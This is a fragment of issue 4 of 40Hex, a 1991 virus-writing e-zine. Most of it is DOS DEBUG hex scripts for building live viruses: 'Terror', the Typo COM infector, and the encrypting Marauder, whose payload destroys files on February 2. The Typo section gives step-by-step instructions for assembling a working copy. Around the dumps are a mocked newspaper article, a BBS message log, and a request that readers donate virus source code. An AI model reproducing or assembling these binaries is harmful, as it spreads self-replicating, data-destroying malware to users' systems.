e 0780 8C 0D 01 00 FE 26 2E 00 8C 0D 04 7F A7 20 6C 15
e 0790 24 25 05 00 20 00 C6 08 60 C1 57 18 08 25 AB 00
e 07A0 44 7F 0A 02 C2 06 57 18 BD 1D 47 01 04 7F 7C 00
e 07B0 C2 06 B6 00 1C 09 AF 1D 3D 1C 07 02 BD 1D 02 02
e 07C0 4D 3A CD 20 C8 F7 E1 EE E7 1A 1A 1A 1A 1A 1A 1A
rcx
7CF
w
q
------------------------------------------------------------------------------
40Hex Issue 4 December 1991
Terror
------
Duh, just as I was about to relase this issue I found that I forgot
to make a artical 4. So here it is.
-------------------------------------------------------------------------------
n terror.com
e 0100 50 8C C8 01 06 0B 01 58 EA 00 01 40 00 90 90 90
e 0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0150 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0160 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0170 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0180 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 01A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 01B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 01C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 01D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 01E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 01F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0200 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0210 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0220 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0230 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0240 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0250 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0260 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0270 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0280 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0290 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 02A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 02B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 02C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 02D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 02E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 02F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0300 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0310 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0330 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0340 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0350 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0360 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0370 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0380 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0390 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 03A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 03B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 03C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 03D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 03E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 03F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0450 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0460 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0470 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0480 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0490 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 04A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 04B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 04C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 04D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 04E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 04F0 90 90 90 90 90 90 90 90 90 90 90 B8 00 4C CD 21
e 0500 EB 44 E4 12 AB 09 8D 13 D0 17 60 14 7A 0F E9 F8
e 0510 03 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0520 90 90 90 90 90 90 44 3A 5C 43 4F 4D 4D 41 4E 44
e 0530 2E 43 4F 4D 00 2E 81 3E 0E 01 5A 4D 74 07 2E 81
e 0540 3E 0E 01 4D 5A C3 2E 8C 1E 41 05 50 B8 59 EC CD
e 0550 21 3B E8 75 3E 0E 1F 58 2E 8E 06 41 05 E8 D5 FF
e 0560 74 10 B9 0D 00 BE 0E 01 06 BF 00 01 57 F3 A4 06
e 0570 1F CB 8C C6 83 C6 10 2E 01 36 24 01 2E 03 36 1C
e 0580 01 2E 8B 3E 1E 01 06 1F FA 8E D6 8B E7 FB 2E FF
e 0590 2E 22 01 B4 30 CD 21 BB 02 01 3D 03 0A 75 12 B8
e 05A0 70 00 BB 43 0D 8E C0 26 80 3F 2E 75 2A 8B C3 EB
e 05B0 2A 83 C3 04 3D 03 14 74 1E 83 C3 04 3D 03 1E 74
e 05C0 16 B8 13 35 CD 21 2E 89 1E 27 05 2E 8C 06 29 05
e 05D0 B8 21 35 8B D3 EB 16 2E 8B 47 02 2E 8B 17 2E A3
e 05E0 27 05 2E C7 06 29 05 70 00 B4 34 CD 21 06 1F B8
e 05F0 EC 25 CD 21 2E A1 41 05 8E C0 48 8E D8 8B 1E 03
e 0600 00 83 EB 65 03 C3 26 A3 02 00 B4 4A CD EC BB 64
e 0610 00 B4 48 CD EC 2D 10 00 8E C0 C6 06 00 00 5A 0E
e 0620 1F BE 00 01 8B FE B9 43 04 90 F3 A4 BF 32 02 06
e 0630 57 CB 26 C7 06 F1 00 70 00 B8 21 35 CD EC 2E 89
e 0640 1E 87 02 2E 8C 06 89 02 B4 25 BA 63 02 0E 1F CD
e 0650 EC 0E 07 BF 43 05 B9 19 00 B0 00 F3 AA E9 F7 FE
e 0660 8B E8 CF 3D 59 EC 74 F8 3D 00 4B 74 1E 80 FC 3D
e 0670 74 21 80 FC 3E 74 44 80 FC 11 75 0A 57 8B FA 80
e 0680 7D 06 08 74 77 5F EA 5C 06 1E 29 E8 91 00 EB F6
e 0690 59 EB F3 51 E8 27 02 72 F7 83 F9 20 59 75 E7 B0
e 06A0 02 9C 2E FF 1E 87 02 72 0F 50 53 8B D8 2E A0 5C
e 06B0 05 2E 88 87 43 05 5B 58 CA 02 00 2E 80 BF 43 05
e 06C0 00 74 C3 50 2E 8A 87 43 05 2E A2 5C 05 2E C6 87
e 06D0 43 05 00 B4 45 CD EC 2E A3 41 05 58 72 A8 9C 2E
e 06E0 FF 1E 87 02 72 D2 53 2E 8B 1E 41 05 1E E8 5F 00
e 06F0 E8 92 00 E8 A6 01 1F 5B F8 CA 02 00 50 52 1E 8A
e 0700 45 07 BA 26 01 0A C0 74 08 04 40 2E A2 26 01 EB
e 0710 03 83 C2 02 0E 1F E8 06 00 1F 5A 58 E9 66 FF 50
e 0720 53 51 E8 99 01 72 24 51 1E E8 23 00 1F B8 01 43
e 0730 33 C9 CD EC 72 07 B8 02 3D CD EC 8B D8 59 72 08
e 0740 E8 42 00 B8 01 43 CD EC E8 51 01 59 5B 58 C3 50
e 0750 52 53 06 B8 13 35 CD EC 2E 89 1E 22 05 2E 8C 06
e 0760 24 05 B0 24 CD EC 2E 89 1E 3D 05 2E 8C 06 3F 05
e 0770 07 5B 0E 1F BA 19 05 B4 25 CD EC BA 1C 05 B0 13
e 0780 CD EC 5A 58 C3 50 51 52 56 57 1E BF 0E 01 B9 FF
e 0790 FF BA FA FF B8 02 42 CD EC B4 3F B9 06 00 0E 1F
e 07A0 8B D7 CD EC 72 1B 2E 81 3D 54 65 74 14 33 C9 33
e 07B0 D2 B8 00 42 CD EC B4 3F B9 18 00 8B D7 CD EC 73
e 07C0 03 E9 C4 00 33 C9 33 D2 2E 80 3E 5C 05 02 75 0B
e 07D0 81 7D 01 00 40 77 EA 49 BA 83 FB B8 02 42 CD EC
e 07E0 A9 0F 00 74 0F 8B CA 8B D0 83 C2 10 80 E2 F0 B8
e 07F0 00 42 EB EA E8 3E FD 74 11 0B D2 75 C4 3D 00 04
e 0800 73 03 E9 83 00 3D 00 FA 77 7E B1 04 D3 E8 8B F0
e 0810 B1 0C D3 E2 03 F2 B4 40 BA 00 01 B9 3D 04 90 CD
e 0820 EC 72 65 E8 0F FD 75 3C 83 EE 10 2E 2B 75 08 2E
e 0830 C7 45 14 00 01 2E 89 75 16 2E C7 45 10 00 04 83
e 0840 C6 44 90 2E 89 75 0E B8 02 42 33 C9 33 D2 CD EC
e 0850 B9 00 02 F7 F1 0B D2 74 01 40 2E 89 55 02 2E 89
e 0860 45 04 EB 12 56 57 06 0E 07 BE 2B 05 B9 0B 00 F3
e 0870 A4 07 5F 8F 45 0B B8 00 42 33 C9 33 D2 CD EC B4
e 0880 40 B9 18 00 8B D7 CD EC B8 00 57 CD EC B0 01 CD
e 0890 EC B4 3E CD EC 1F 5F 5E 5A 59 58 C3 50 52 1E B8
e 08A0 13 25 2E 8B 16 22 05 2E 8E 1E 24 05 CD EC B0 24
e 08B0 2E 8B 16 3D 05 2E 8E 1E 3F 05 1F 5A 58 C3 50 06
e 08C0 57 53 8B FA 1E 07 B0 00 B9 40 00 F2 AE 8B 45 FD
e 08D0 8B 4D FB 25 5F 5F 80 E5 5F 3D 4F 4D 75 09 81 F9
e 08E0 2E 43 74 0E F9 EB 2D 3D 58 45 75 F8 81 F9 2E 45
e 08F0 75 F2 B9 07 00 BB FF FF 43 8A 41 F4 24 5F 2E 3A
e 0900 87 29 01 E1 F3 B0 01 75 02 B0 02 2E A2 5C 05 B8
e 0910 00 43 CD EC 5B 5F 07 58 C3 B0 03 CF 80 FC 03 74
e 0920 05 EA C8 0E 1E 29 EA 7A 0F 70 00 50 8C C8 01 06
e 0930 0B 01 58 EA 00 01 20 54 65 72 72 6F 72 1A 1A 1A
rcx
083d
w
q
-------------------------------------------------------------------------------
40Hex Issue 4 December 1991
"No feelings of what I left behind, no guilt for the victims of my
crime. No compassion, just a burning deep inside. No pain... I'm here
just to die... " - Sub Zero
This artical is from the 11/26/91 morning final of the San Jose Mercury News
**text written like this is my comments**
SURVEY DEFLATES COMPUTER-VIRUS DANGERS
But safeguards are few as cases proliferate.
Computer viruses, those nasty bits of distructive programming unleashed
by deviant hackers, are multiplying at a startling rate - but haven't
proved nearly as troublesome as once feared and aren't scaring users
enough to take even simple safeguards.
Dataquest Inc. a marker research firm in San Jose released a
groundbreaking 150-page survey Monday showing that almost two-thirds of
business and government orginazatons with more than 300 personal
computers has encountered a viurs at least once this year. Yet only 15
percent of them has installed anti-virus software.
What's more, Dataquest found the virus encounters more than doubled
in each of the first three quarters of 1991. **<smile, smile>**
The National Computer Security Association of Washington D.C., which
represents 1,000 developers of anti-virus software, hired Dataquest to
conduct what is apparently the first study of virus proliferation by a
reseacher not directly employed by an anti-virus software company.
Computer viruses hide themselves in legitamate files, jumping from
machine to machine. Triggered either at random or on a set date, such
as Friday the 13th, the most destructive viruses gobble up programs and
data in their host computers. **gobble???**
Robert Morris, then a student at Cornell University, unleashed a
the biggest virus to date in November 1988 **please** when a program he
intended to queitly slip onto a network call Internet went out of
control and temporally shut down 6,000 computers at universitys and
government reaserch labrotorys nationwide. In the wake of the Internet
case, there were dire predictions of future virus attacks the could
bring the entire economy grinding to a halt.
But there haven't been any major virus outbreaks since then and, it
turnded out, the Internet virus **Internet worm, damn it!!!** did little
permanent damage.
What's more, most viruses are relitavely mild - more like a case of
sniffles the double pnemonia. Typically, these mild viruses take up
space in the computers memory and slow down operations, but don't
destroy data. ** :) :( **
"Many viruses are very innocuous," said Shella Cotter, director of
software consulting for Dataquest. "You find them, you identify them and
you get rid of them."
"Many of the viruses I've heard about have not been big problems,"
added Jay BloomBecker ** tell me he aint gay **, director of the
National Center for Computer Crime Data in Santa Cruz. "But it's
significant enough that if you're not paying attention to it, you
security is probably inadeqaute."
Anti-virus software sold over the counter automatcally plucks out
the most of the roughly, 1,000 viruses identifey thoughout the world.
Occasoinally however, killer viruses can take over an entire computer
system and threaten a buisness with massive losses of crucial
information.
Dataquest talked to 600 orginazations during October and dicovered
that 63 percent had encountered at least one virussince the beginning of
the year. Of these reporting and encounter, 62 percent claimed "a
definite loss of productivity," although the $70,000 study did not
tabulate the total cost.
In the survey group, 9 percent reported a "virus disaster," defined
as a single incedent affecting 25 or more personal computers or
diskettes. On average, computers involved in a virus disaster were out
of commision four days and required reprogramming at a cost of $6,200.
And, in 3 percent of virus attacks, either the person who introduced
the virus or the person responible for computer security was threatened
with dismmisal. Dataquest didn't count how many were actually fired.
"Computer viruses are much more prevalent than people think and,
unless we think, and unless we take precautions, over time they are
going to get worse," said Andrew Seybold, head of the Dataquest servey
team.
But anti-virus software and strict enforcement of computer scurity
policies could change in the future.
"The good news is, it's solveable. The bad news is companies aren't
chossing to solve it,", Cotter concluded. ** The other way around for
us **
40Hex Issue 4 December 1991
The Typo COM Virus
The Typo Virus comes in 2 forms - a boot sector infector, and a
COM file infector. This version is the COM version. The effective
length of the virus is 867 bytes, and it only infects COM files. Typo
stays resident, and can infect files whether they are run or not, from my
experience. Typo isn't a destructive virus, but it does garble any
output to the parallel ports, by exchanging certain letters with others
that sound similar, and by transposing numbers. Sometimes it replaces
one number with an entirely different number. Typo is believed to have
originated in Israel, because some Hebrew letters are changed when it is
active, and it was isolated in that country. Typo is easily detected by
SCAN, and the scan string is "A1 58 00 2E 89 84 99 FE 26 A1 5A 00" in lines
400 and 410 of the hex dump, below.
To assemble TYPO.COM, cut out the following hex, and name the resulting
file TYPO. Then, issue the command DEBUG < TYPO and you will have a
working version of the virus.
--DecimatoR
----------------------------Cut Here------------------------------
n typo.com
e 0100 E9 18 00 31 E9 FF FF 2A 2E 43 4F 4D 00 CD 20 20
e 0110 56 31 05 00 CE CD 20 00 59 00 00 53 51 52 1E 06
e 0120 56 0E 1F E8 00 00 5E 83 EE 24 FF 4C 16 83 7C 16
e 0130 03 75 05 C7 44 16 5B 00 E8 85 02 BA D0 00 B4 1A
e 0140 CD 21 8A 44 0B 88 44 12 8B 44 0C 89 44 13 B4 2A
e 0150 CD 21 F6 C2 01 75 1F 8B D6 81 C2 05 00 33 C9 B4
e 0160 4E CD 21 72 11 E8 2C 00 8B D6 81 C2 05 00 33 C9
e 0170 B4 4F CD 21 73 EF 8A 44 12 A2 00 01 8B 44 13 A3
e 0180 01 01 BA 80 00 B4 1A CD 21 5E 07 1F 5A 59 5B B8
e 0190 00 01 FF E0 B8 01 43 BA EE 00 33 C9 CD 21 B8 02
e 01A0 3D BA EE 00 CD 21 73 03 E9 B4 00 89 44 10 8B D8
e 01B0 B4 3F B9 03 00 8B D6 81 C2 0B 00 CD 21 80 7C 0B
e 01C0 E9 75 30 8B 54 0C 83 EA 16 33 C9 B8 00 42 8B 5C
e 01D0 10 CD 21 8B D8 B4 3F B9 02 00 8B D6 81 C2 0E 00
e 01E0 8B 5C 10 CD 21 72 65 3D 00 00 74 07 8B 44 0E 3B
e 01F0 04 74 59 33 C9 33 D2 B8 02 42 8B 5C 10 CD 21 72
e 0200 4B 2D 03 00 89 44 03 8B 5C 10 B4 40 B9 63 03 90
e 0210 8B D6 81 C2 00 00 CD 21 72 32 83 44 03 19 33 D2
e 0220 33 C9 B8 00 42 8B 5C 10 CD 21 72 20 8B 5C 10 B4
e 0230 40 B9 03 00 8B D6 81 C2 02 00 CD 21 B8 01 57 8B
e 0240 5C 10 8B 0E E6 00 8B 16 E8 00 CD 21 8B 5C 10 B4
e 0250 3E CD 21 B8 01 43 BA EE 00 8A 0E E5 00 CD 21 C3
e 0260 FB 80 FC DD 75 03 8A C4 CF 80 FC 00 74 6C EA 2E
e 0270 E8 00 F0 C7 84 C7 84 59 00 60 31 32 33 34 35 36
e 0280 37 38 39 30 2D 3D 5C 7E 21 40 23 24 25 5E 26 2A
e 0290 28 29 5F 2B 7C 71 77 65 72 74 79 75 69 6F 70 5B
e 02A0 5D 5B 61 73 64 66 67 68 6A 6B 6C 3B 27 7A 78 63
e 02B0 76 62 6E 6D 2C 2E 2F 51 57 45 52 54 59 55 49 4F
e 02C0 50 7B 7D 41 53 44 46 47 48 4A 4B 4C 3A 22 3B 5A
e 02D0 58 43 56 42 4E 4D 3C 3E 3F 2E 56 E8 00 00 5E 9C
e 02E0 2E FF 5C 91 53 06 BB 40 00 8E C3 26 8B 1E 6C 00
e 02F0 53 2E 2B 5C 95 83 FB 02 5B 2E 89 5C 95 7F 39 2E
e 0300 87 5C 97 2E 2B 5C 97 F7 DB 2E 3B 5C 99 7C 29 2E
e 0310 FF 4C 99 2E 83 7C 99 06 74 06 2E C7 44 99 5B 00
e 0320 83 EE 65 51 B9 61 00 2E 3A 04 74 07 46 E2 F8 59
e 0330 EB 06 90 59 2E 8A 44 01 07 5B 5E CA 02 00 80 FC
e 0340 00 74 05 80 FC 4C 75 19 E8 24 00 2E 8B 16 2C 00
e 0350 8E C2 BB 00 00 B4 4A CD 21 BA 1D 00 83 C2 01 B4
e 0360 31 EA 60 14 73 02 B8 00 4C EB D3 3F 14 73 02 51
e 0370 57 56 06 E8 00 00 5E 56 BF 00 01 B9 DE 00 2E 8A
e 0380 84 EA FE 2E 88 05 46 47 E2 F4 5E 33 C9 8E C1 2E
e 0390 8B 4C EC 26 89 0E 84 00 2E 8B 4C EE 26 89 0E 86
e 03A0 00 2E 8B 4C F5 26 89 0E 80 00 2E 8B 4C F7 26 89
e 03B0 0E 82 00 B9 00 01 26 89 0E 58 00 07 5E 5F 59 C3
e 03C0 50 32 C0 B4 DD CD 16 3A C4 75 02 58 C3 53 56 06
e 03D0 8B 54 16 E8 00 00 5E 53 06 BB 40 00 8E C3 26 8B
e 03E0 1E 6C 00 2E 89 9C 9D FE 2E 89 9C 9F FE 07 5B 89
e 03F0 94 A1 FE 33 C0 8E C0 26 A1 84 00 2E 89 44 8C 26
e 0400 A1 86 00 2E 89 44 8E 26 A1 58 00 2E 89 84 99 FE
e 0410 26 A1 5A 00 2E 89 84 9B FE 26 A1 80 00 2E 89 44
e 0420 95 26 A1 82 00 2E 89 44 97 FA 0E 26 8F 06 86 00
e 0430 26 89 36 84 00 26 81 2E 84 00 98 00 0E 26 8F 06
e 0440 82 00 26 89 36 80 00 26 83 2E 80 00 70 0E 26 8F
e 0450 06 5A 00 26 89 36 58 00 26 81 2E 58 00 76 01 FB
e 0460 07 5E 5B 58 C3 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
rcx
464
w
q
--------------------------Cut Here Too-----------------------------
Notice to all: 40Hex is always looking for new viruses to do write ups
on, and new source code to distribute. If you have a copy of a rare
virus, and/or viral source code, please send it to Digital Warfare BBS,
at 717-367-3501. We'll be happy to give you the credit for donating it -
IF you want us to. ;)
---Dec
40Hex Issue 4 December 1991
How Lame Are These People?
-------------------------
This text is from the Homebase BBS, Mcaffee's board, all I can say is
read it. Special apperance from Data Distruptor of Rabid and
Lestat/Skism, AKA me... Read on...
Msg#: 5712 *viru*
11-19-91 17:11:34
From: TERRY ROSS
To: ALL
Subj: IS THIS A VIRUS?
Hi. Is there a known virus which displays a screen which reads "INC, for
quality cracks?" I have recently inherited a computer at the company I work at
and there was apparently some tetris and blockout games on the disk which are
the source of this message. I found a file called "runme.bat" with the text in
it, but even after I deleted it, it still pops up the aforementioned message.
Also, the message gives me a choice of EGA CGA or monochrome and in general,
the message makes life difficult for me.
any help with this would be vastly appreciated.
<*>Replies
<A>gain, <R>eply, <N>ext, or <S>top?
Msg has replies, read now(Y/N)? y
Msg#: 5715 *viru*
11-19-91 17:50:59
From: ARYEH GORETSKY
To: TERRY ROSS
Subj: REPLY TO MSG# 5712 (IS THIS A VIRUS?)
If you can upload a copy of an infected file, we can see if it contains viral
code.
Aryeh Goretsky
Tech Support
<->, <A>gain, <R>eply, <N>ext, or <S>top? N
-- The below text was deleted by Aryeh, I don't think he likes me --
Msg#: 5718 *viru*
11-19-91 19:42:34
From: LESTAT /SKISM
To: TERRY ROSS
Subj: REPLY TO MSG# 5712 (IS THIS A VIRUS?)
It's not a virus. INC is the International Network of Crackers. What they do
is unprotect games and distribute them. What you do have is most likely
illegally obtained software.
<->, <D>elete, <A>gain, <R>eply, <N>ext, or <S>top?
End of Replies, add yours(Y/N)? N
Msg#: 5717 *viru*
11-19-91 18:01:25
From: DATA DISRUPTOR
To: ARYEH GORETSKY
Subj: REPLY TO MSG# 5597 (RABID)
Haha! Funny guy. I believe you are referring to the Roland D-10 and S-10
series of keyboards... R-10 being a keyboard... bah!
Data Disruptor RABID Int'nl Development Corp.
<*>Replies
<->, <A>gain, <R>eply, <N>ext, or <S>top?
Msg has replies, read now(Y/N)? y
-- Again I was deleted, come on Aryeh old buddy --
Msg#: 5719 *viru*
11-19-91 19:45:03
From: LESTAT /SKISM
To: DATA DISRUPTOR
Subj: REPLY TO MSG# 5717 (RABID)
Thats coming from a guy who thinks INC are virus writers. Jessh.
<->, <D>elete, <A>gain, <R>eply, <N>ext, or <S>top?
End of Replies, add yours(Y/N)? N
40Hex Issue 4 December 1991
"I take my boys everywhere I go, cause I'm paranoid..."
The Marauder Virus
------------------
December marks the first year of the group Skism. The alliance of
Phalcon/Skism took place around July 1991. Me and a few freinds at
school started the group by hacking old viruses into new strains.
Well I have lost contact with these people since then and a new
breed of members has risen from the ashes.
Well, I myself have learned a lot over the year. I went from virus
hacker with about three viruses to my name, to overwritting man,
to what I am now. An advanced (kind of) level assembler programmer,
writing parasitic infectors. Well come this time next year I belive
I'll be into more major stuff, ya know sick mother fucking DIR-2
type action. I've written a couple of TSR viruses shells, nothing
completed yet. Well anyway here's my personal latest creation -
Marauder. What Marauder is, is this ----
Marauder Virus
By Hellraiser
of Phalcon/Skism
Aliases: Deadpool-B, 808-B, 860.
Marauder is a non-overwriting, non-resident, encrypting, semi-mutating,
.COM file infector.
When a file is infected with the Marauder Virus the virus will search
the current path for a .COM file and infect it, adding 860 bytes to the
files size. If not .COM files reside in the current directory, the
virus will go up one directory and check for .COM files to infect untill
it reaches the root. At the root directory the virus will scan for
other directorys to find .COM files, until one uninfected .COM file is
found. If no .COM files are found on the disk the virus will terminate
it search and return to the currently running program.
If an infected file is run on Feburary second of any year, the virus
will destroys all files in the current directory, by overwritting them
with message code. The files will not run when executed, just terminate
upon reading the first line. There is no way to recover the files once
the virus destroys them. After this control will be given back to the
host program.
The Maruder virus is able to infect any .COM file no matter what
attribute... Hidden, System, Read-Only, etc... The files date, time, and
attribute will not be changed after a file becomes infected.
The virus will not cause a system error if run on a write-protected
floppy or fixed-disk, merely terminate any attempt of infection.
The virus will not infect files under 16 bytes or over 64,675 bytes.
For the most part the virus is randomly encrypted with each passing
infection, the small part of the program code which is not encrypted
mutates between two different, but comaptable strain of bytes.
There is not way of detecting the virus infections other than the
addition of 860 bytes to infected files, in other words, system-run time
is not affected at all. If any run-time is affected it is the split
second it takes for the virus to infect a file.
The virus causes no damage to disk sectors or boot records etc... The
only perminate damage is the destuction of all files in the current
directory on 02/02/XX.
And here it is...
-------------------------------------------------------------------------------
n target.com
e 0100 E9 61 00 88 68 69 73 20 66 69 6C 65 20 69 73 20
e 0110 69 6E 66 65 63 74 65 64 20 77 69 74 68 20 74 68
e 0120 65 20 4D 61 72 61 75 64 65 72 20 76 69 72 75 73
e 0130 2E 20 31 39 39 32 2C 20 48 65 6C 6C 72 61 69 73
e 0140 65 72 20 50 68 61 6C 63 6F 6E 2F 53 6B 69 73 6D
e 0150 2E 0D 0A 24 20 20 20 20 20 20 20 B4 09 BA 03 01
e 0160 CD 21 CD 20 E8 00 00 5E 81 EE 0E 01 E8 05 00 E9
e 0170 85 00 3A 28 8B EE 81 C6 65 04 8B FE 50 53 51 52
e 0180 B9 8F 01 FD AD 33 86 19 01 AB E2 F8 5A 59 5B 58
e 0190 8B F5 C3 E8 DE FF CD 21 E8 D9 FF C3 7A 6B 7B 6A
e 01A0 91 B5 13 99 FC 93 D4 51 13 99 EC EE 99 E7 4A 49
e 01B0 4B 48 99 FC 93 D4 77 16 99 EC 42 41 43 40 AB 9D
e 01C0 13 EF 48 4B 49 4A 99 E7 DF 32 32 49 5F 73 60 73
e 01D0 67 76 77 60 4F 32 23 2B 2B 20 32 5A 77 7E 7E 60
e 01E0 73 7B 61 77 60 32 3F 32 42 7A 73 7E 71 7D 7C 3D
e 01F0 41 79 7B 61 7F 3C 1A 2E 82 0C 0F E5 1B A1 A6 76
e 0200 3E A4 BE 48 3E 2F 82 0C 1F A5 AE 4A 3E E5 1B 7E
e 0210 8E 6F 08 FA BB EE EC 2C F7 09 64 9C 23 E5 1B 2C
e 0220 7B A0 BE FB 3E 90 00 74 B3 AC EE 2C 6C 75 B7 9E
e 0230 75 2C B7 96 69 2C 83 2C 3A D4 C9 8C 6F 76 8E 32
e 0240 B7 BC 55 2C F7 09 8E 02 F7 09 BB D2 38 2A 4F 2B
e 0250 D3 96 3B 9C 74 A5 AE 10 3E 91 3D 28 F7 09 49 6C
e 0260 8E 32 B7 BC 22 2D F7 09 8E 13 B7 BC 78 2C F7 09
e 0270 48 2A D1 E2 BA 94 67 2C 3B 5C 23 98 3B A0 BE 75
e 0280 3E 9C 74 1B F3 99 29 A5 AE 16 3E E5 1B 5B 33 C1
e 0290 69 29 AA B8 8E 67 D1 DB 8E 13 B7 BC 0C 2D F7 09
e 02A0 48 DA D1 B2 B1 B4 BE 2C B3 B4 71 2C 82 29 79 1B
e 02B0 F3 A5 AE A5 3E E5 1B 5A 05 C0 A0 29 48 12 B3 AC
e 02C0 76 2C B1 B4 BD 2C B3 B4 7D 2C B1 B4 BF 2C B3 B4
e 02D0 73 2C A9 9C 05 91 3E 28 B7 BC 75 2C F7 09 BA 94
e 02E0 68 2C B2 5D 1F 90 3B 6B B1 A4 71 2C B7 BC B7 2C
e 02F0 08 C5 F7 09 8E 16 F7 09 07 2D 3A 5C 30 15 38 28
e 0300 4E 2D 8E 67 D3 7D C5 C1 E1 28 BB 94 75 2C 77 72
e 0310 4E FB D2 1F 3B 15 2A 28 48 E3 07 B7 C6 5B FC 05
e 0320 39 28 B2 8C 63 2C B2 AC 62 2C FC AC 60 2C B2 B8
e 0330 8E C1 B2 8C 6D 2C 08 E8 B2 AC 67 2C C5 AC 7F 2C
e 0340 B1 C6 D2 CF 3A 9C 16 E5 1B AB C0 28 4E DF B3 BC
e 0350 23 29 8B 20 E9 E2 B3 BC 61 2C BA D2 24 56 39 C3
e 0360 1A B8 B7 9E 79 29 B7 96 21 29 83 38 3A C0 82 28
e 0370 B7 9E 69 29 B7 96 09 29 83 2E 3A C0 90 28 D1 35
e 0380 AA A5 8C 71 3B A5 84 33 3B 91 2A 28 D2 B1 3A A5
e 0390 8C 41 3B A5 84 1B 3B 91 3C 28 D2 A3 3A C0 B6 28
e 03A0 B1 DD 8E 68 83 7F 39 AB FB 2D B7 BC 31 29 D2 CA
e 03B0 C7 5A 34 C0 B6 28 8E 68 83 2C 3A A5 AE 7F 3E E5
e 03C0 1B 90 3B 7F B1 A4 73 2C B1 BC 7D 2C B1 B4 76 2C
e 03D0 F7 09 8E 16 F7 09 82 29 79 A3 B6 63 3E A5 AE A5
e 03E0 3E 1A D7 E5 1B 9C 01 A5 AE FB 3E E5 1B 9C 20 92
e 03F0 BA 28 F7 09 6C 75 82 0C 1F A5 AE 76 3E E5 1B A5
e 0400 8C 7B 3E 97 3A 29 83 2C 3A D4 C9 8C 85 28 3B D7
e 0410 DD C0 22 28 8E 66 83 2F 3A A5 AE 16 3E E5 1B 5A
e 0420 F6 C0 06 28 8E 67 D1 DD C6 DB 9E EB B1 DD BB EE
e 0430 79 29 B1 D6 83 05 3A 85 09 AE 61 2C 91 CA C2 A3
e 0440 CF EB 82 28 78 1B F3 1B E8 E5 1B EB 82 2A 78 1B
e 0450 E8 1B F3 E5 1B EB 82 2A 07 A5 AE A5 3E E5 1B EB
e 0460 D2 DB C5 5A 11 A3 E2 7B D2 C9 C5 93 15 28 CD DB
e 0470 B1 E0 61 79 D2 E3 C5 71 6B 9C 7A 91 15 28 B7 BC
e 0480 55 29 F7 09 48 2E 63 61 D9 2A D1 C4 8E 16 F7 09
e 0490 F9 02 14 6B 75 65 3A 02 14 02 3A 06 14 28 3B 28
